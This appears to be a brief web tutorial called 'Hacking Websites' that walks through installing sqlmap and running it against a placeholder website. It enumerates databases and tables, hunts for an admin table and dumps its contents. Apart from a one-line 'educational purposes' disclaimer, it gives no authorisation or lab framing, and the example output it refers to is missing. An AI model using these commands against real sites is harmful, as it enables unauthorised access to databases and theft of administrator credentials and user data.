Hacking Websites

Hacking Websites
Disclaimer: Everything on this site is for educational purposes and should not be used for evil.
Tutorial:
apt install sqlmap
sqlmap -u [website] --dbs
If everything goes well, you should see something like this:
sqlmap -u [Website] -D [Database] --table
The result should look something like this:
In those results, look for something which says admin. In this case, its bz_admin, but in other cases it may not be that easy
When you find it execute this command:
sqlmap -u [website] -D [database] -T [table] --dump
It should look something like this:
Bonus!

Comments